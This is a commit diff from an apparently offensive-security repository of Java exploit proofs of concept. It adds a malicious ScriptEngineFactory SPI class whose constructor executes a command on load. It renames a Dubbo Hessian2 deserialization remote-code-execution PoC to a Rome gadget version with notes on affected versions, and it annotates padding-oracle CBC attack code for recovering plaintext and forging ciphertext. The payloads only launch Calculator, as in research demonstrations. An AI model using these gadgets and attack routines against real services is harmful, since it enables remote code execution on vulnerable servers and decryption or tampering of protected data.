feat:优化padding oracle cbc相关&添加spi的恶意类&增加fastjson-1.2.62依赖

Author: threedr3am

lib/fastjson-1.2.62.jar

@@ -4,13 +4,9 @@
 public class Calc {
   static {
     try {
-      Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
+      Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
     } catch (Throwable e) {
       e.printStackTrace();
     }
   }
-
-  public static void main(String[] args) {
-
-  }
 }

src/main/java/Calc.java

@@ -0,0 +1,77 @@
+import java.util.List;
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineFactory;
+
+/**
+ * @author threedr3am
+ */
+public class CalcScriptEngineFactory implements ScriptEngineFactory {
+
+  public CalcScriptEngineFactory() {
+    try {
+      Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
+    } catch (Throwable e) {
+      e.printStackTrace();
+    }
+  }
+
+  @Override
+  public String getEngineName() {
+    return null;
+  }
+
+  @Override
+  public String getEngineVersion() {
+    return null;
+  }
+
+  @Override
+  public List<String> getExtensions() {
+    return null;
+  }
+
+  @Override
+  public List<String> getMimeTypes() {
+    return null;
+  }
+
+  @Override
+  public List<String> getNames() {
+    return null;
+  }
+
+  @Override
+  public String getLanguageName() {
+    return null;
+  }
+
+  @Override
+  public String getLanguageVersion() {
+    return null;
+  }
+
+  @Override
+  public Object getParameter(String key) {
+    return null;
+  }
+
+  @Override
+  public String getMethodCallSyntax(String obj, String m, String... args) {
+    return null;
+  }
+
+  @Override
+  public String getOutputStatement(String toDisplay) {
+    return null;
+  }
+
+  @Override
+  public String getProgram(String... statements) {
+    return null;
+  }
+
+  @Override
+  public ScriptEngine getScriptEngine() {
+    return null;
+  }
+}

src/main/java/CalcScriptEngineFactory.java

@@ -17,10 +17,20 @@
 import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
 
 /**
- * dubbo 默认配置，即hessian2反序列化，都可RCE
+ * dubbo 默认配置，即hessian2反序列化，都可RCE（dubbo版本<=2.7.5）
+ *
+ * Spring和Spring boot环境下都能打
+ *
+ *
+ * <dependency>
+ *    <groupId>com.rometools</groupId>
+ *    <artifactId>rome</artifactId>
+ *    <version>1.7.0</version>
+ * </dependency>
+ *
  * @author threedr3am
  */
-public class JdbcRowSetImplPoc {
+public class RomePoc {
 
   static {
     //rmi server示例
@@ -72,8 +82,9 @@ public static void main(String[] args) throws Exception {
     ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
     Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
 
+    //todo 经测试，以下4个随意填
+    //注册中心获取到的service全限定名、版本号、方法名
     out.writeUTF("2.0.2");
-    //todo 此处填写注册中心获取到的service全限定名、版本号、方法名
     out.writeUTF("com.threedr3am.learn.server.boot.DemoService");
     out.writeUTF("1.0");
     out.writeUTF("hello");

src/main/java/com/threedr3am/bug/dubbo/JdbcRowSetImplPoc.java renamed to src/main/java/com/threedr3am/bug/dubbo/RomePoc.java

@@ -8,6 +8,8 @@
 /**
  * padding oracle java实现（多组密文实现）
  *
+ * todo 用于利用padding oracle爆破出原文
+ *
  * @author threedr3am
  */
 public class PaddingOracle {

src/main/java/com/threedr3am/bug/paddingoraclecbc/PaddingOracle.java

@@ -6,6 +6,8 @@
 /**
  * padding oracle cbc java实现（单组 <= 16bytes 密文实现）
  *
+ * todo 用于padding oracle爆破单组密文的原文，然后cbc攻击修改iv，使密文解密可以变成我们预期的明文
+ *
  * @author threedr3am
  */
 public class PaddingOracleCBC {

src/main/java/com/threedr3am/bug/paddingoraclecbc/PaddingOracleCBC.java

@@ -8,6 +8,8 @@
 /**
  * padding oracle cbc java实现（多组密文实现）
  *
+ * todo 用于padding oracle爆破多组密文的原文，然后cbc攻击修改每一段iv，使密文解密可以变成我们预期的明文
+ *
  * @author threedr3am
  */
 public class PaddingOracleCBC2 {